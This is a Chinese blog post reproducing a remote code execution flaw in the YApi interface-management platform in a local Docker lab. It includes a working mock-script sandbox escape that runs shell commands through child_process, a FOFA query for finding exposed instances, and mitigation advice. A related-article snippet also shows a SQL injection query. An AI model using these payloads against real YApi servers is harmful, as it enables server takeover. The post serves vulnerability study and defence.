YAPI开源接口管理平台远程代码执行漏洞复现

最新推荐文章于 2024-06-01 16:37:59 发布
最新推荐文章于 2024-06-01 16:37:59 发布
阅读量424 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: docker web linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G20171130/article/details/118607416
版权

YAPI开源接口管理平台远程代码执行漏洞复现

前言

该漏洞环境为本地搭建,本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任!
漏洞详情
YAPI接口管理平台是国内某旅行网站的开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。
该漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,攻击者可利用该漏洞在受影响的服务器上执行任意javascript代码,最终导致接管并控制服务器。
Github地址:https://github.com/jinfeijie/yapi

影响版本

YAPI全版本

FOFA

app="YApi"

漏洞复现

环境搭建

Docker搭建:https://github.com/jinfeijie/yapi

git clone https://github.com/jinfeijie/yapi.git

编辑docker-compose.yml文件,把监听设置127.0.0.1:3000:3000修改为0.0.0.0:3000:3000(这样搭建完成以后可以通过网络进行外部访问)

version: '2.1'
services:
  yapi:
    image: mrjin/yapi:latest
    # build: ./
    container_name: yapi
    environment:
      - VERSION=1.5.6
      - LOG_PATH=/tmp/yapi.log
      - HOME=/home
      - PORT=3000
      - ADMIN_EMAIL=me@jinfeijie.cn
      - DB_SERVER=mongo
      - DB_NAME=yapi
      - DB_PORT=27017
    # restart: always
    ports:
      - 127.0.0.1:3000:3000
    volumes:
      - ~/data/yapi/log/yapi.log:/home/vendors/log # log dir
    depends_on:
      - mongo
    entrypoint: "bash /wait-for-it.sh mongo:27017 -- entrypoint.sh"
    networks:
      - back-net
  mongo:
    image: mongo
    container_name: mongo
    # restart: always
    ports:
      - 127.0.0.1:27017:27017
    volumes:
      - ~/data/yapi/mongodb:/data/db #db dir
    networks:
      - back-net
networks:
  back-net:
    external: true

漏洞利用

注意:漏洞利用前提是需要开启注册功能 (YApi默认是开启注册功能)
登录页面如下:
在这里插入图片描述
在这里插入图片描述
先随意注册一个账号test;
在这里插入图片描述
在右上角点击新建项目:
在这里插入图片描述
项目名称和路径如下图所示:
在这里插入图片描述

设置全局mock脚本及接口,在设置里面找到全局mock脚本,勾上是否开启。mock脚本内容如下

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ls -al").toString()

在这里插入图片描述
随后添加接口:
在这里插入图片描述
在这里插入图片描述
访问接口的mock地址:
在这里插入图片描述

http://192.168.1.7:3000/mock/17/test/test

服务器可看到响应如下,远程服务器接受到请求
在这里插入图片描述

防御措施

先把服务器全盘重装了,数据库一定要提前备份:
1、更改Yapi运行端口
2、使用Nginx对Yapi进行反向代理
3、安全组只开放Nginx端口,你可以在Nginx限制IP白名单。
4、关闭Yapi注册
5、关闭Yapi Mock

参考文献

https://github.com/YMFE/yapi/issues/2233
https://github.com/YMFE/yapi/issues/2099

F10Sec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Yapi接口管理平台RCE漏洞汇总
做自己喜欢的事,并将其发挥到极致!
01-10 6434
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理
一个基于YAPI接口生产代码开源工具
rqj的专栏
09-03 263
现在低代码框架平台很多,找到了一个基于YAPI接口生产代码开源工具,但是很简单,在分析了代码后,做了点改造,定义好接口后,可以直接生成controller-service-dao,entity-mapper-sql库表创表语句,可以嘚瑟的说下,我定义好接口,已经完成30%的基本代码开发,接下去就是对生成好的代码进行业务整合。它以项目为维度,可以同步swagger接口,支持mock接口,支持内网部署,可以在需求设计阶段,设计好前后端交互接口协议,mock数据。从而影响项目的交付进度。
YAPI-开源
04-26
YAPI(Y图表应用程序程序员接口,又名另一个程序员接口)是一个用于编写(卡恩)过程网络的C ++库。
七、【漏洞复现】YApi接口管理平台远程代码执行漏洞
weixin_52351575的博客
09-21 428
​YApi接口管理平台存在一种远程代码执行漏洞。攻击者可以在注册并登录YApi后,通过构造特殊的请求来执行任意代码,从而接管服务器。这个漏洞可能会导致严重的安全风险,因此建议用户及时修复漏洞,更新到最新版本的YApi。3、 编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3.新建接口-接口名称随意-接口路径为/随意。
强大的开源API接口可视化管理平台-YApi
最新发布
软件测试技术分享官
06-01 1560
YApi是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理。本文将带领大家搭建YApi接口平台
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
2401_83974173的博客
04-16 749
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
开源可视化接口管理平台-YApi
qq_29860591的博客
03-28 1167
yapi简介: YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理 特性 基于 Json5 和 Mockjs 定义接口返回数据的结构和文档,效率提升多倍 扁平化权...
开源接口管理平台 YApi
weixin_30553837的博客
08-27 174
开源接口管理平台 YApi:http://yapi.demo.qunar.com/ 转载于:https://www.cnblogs.com/oklizz/p/11420184.html
YAPI远程执行漏洞复现
weixin_46580614的博客
08-02 370
YAPI远程执行漏洞复现 实验靶机 BUUCTF :题目 ezrce 漏洞详情 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令
Yapi Mock 远程代码执行漏洞
weixin_45694388的博客
07-09 587
跟风一波复现Yapi 漏洞描述: YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响 fofa: Fofa:app="YApi" 漏洞复现: 默认注册功能开启。 注册后创建项目: 添加接口: 创建接口成功: 选择“高级Mock”,“脚本”,开启脚本: 写入poc并保存: const sandbox = this const ObjectConstruc
免费开源可视化接口API管理平台——YAPI
云度
09-07 7426
YAPI简介: 在之前有些时日,曾经写过一个API管理平台——DOClever,但是总觉得界面上稍微差了点,刚好之前有朋友在评论区留言,让我知道了今天要介绍的这个平台YAPI,YApi 是一个可本地部署的、打通前后端及QA的、可视化的接口管理平台,由去哪儿网 YMFE团队推出免费开源可视化接口API管理平台——YAPI,在体验之后,感觉从各方面来说可能都要比DOClever要强上一些,...
YApi Mongo注入导致RCE漏洞复现
fly夏天的博客
01-31 749
文章复现了yapi mongo注入导致rce漏洞,并提供了可运行的复现代码
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 981
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
开源api接口管理平台--YApi部署过程
CodeSunShines
11-13 874
1、安装git yum install git 2、安装node 附上自己找的解决官方命令不能安装node的解决方法,注意node版本安装7.6+:这里这里 3、安装mongoDB 附上自己参考安装的链接:这里这里 4、参考官网开始安装 官网内网部署教程 方式一. 可视化部署[推荐] 执行 yapi server 启动可视化部署程序,输入相应的配置和点击开始部署,就能完成整个网站的部署。部署完成之后,可按照提示信息,执行 node/{网站路径/server/app.js} 启动服务器。在浏览器打开指定ur
开源API管理工具--eolinker4.0部署,Yapi部署
kunwen123的博客
04-06 689
当Swagger遇上YApi,瞬间高大上了! Yapi离线安装 开源API管理工具—eolinker4.0部署教程
漏洞复现----34、yapi 远程命令执行漏洞
七天
06-24 1807
Yapi远程命令执行漏洞
yapi 权限_「开源」高效、易用、功能强大的 api 管理平台Yapi
weixin_35701696的博客
01-04 148
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口管理。首先,这个产品的审美是在线的。好看就有让我用下去的动力。特性基于 Json5 和 Mockjs 定义接口返回数据的结构和文档,效...
Yapi安装部署到后台运行从0到1,女朋友看了都摇头(超详细版)
Dylan的博客
01-20 1809
Yapi安装部署到后台运行从0到1,解决mongodb 权限问题,mongoshell脚本,以及yapi后台运行问题,以及npm下载问题。本章几乎是把yapi遇到坑全部梳理一遍。
YApi远程命令执行漏洞详解与修复
"该文档分析了YApi远程命令执行漏洞,主要涉及1.12.0以下版本,包括漏洞的概述、环境搭建、漏洞分析和补丁分析等环节。攻击者可以利用MongoDB的盲注漏洞获取项目token,枚举用户uid生成API调用凭证,进一步利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值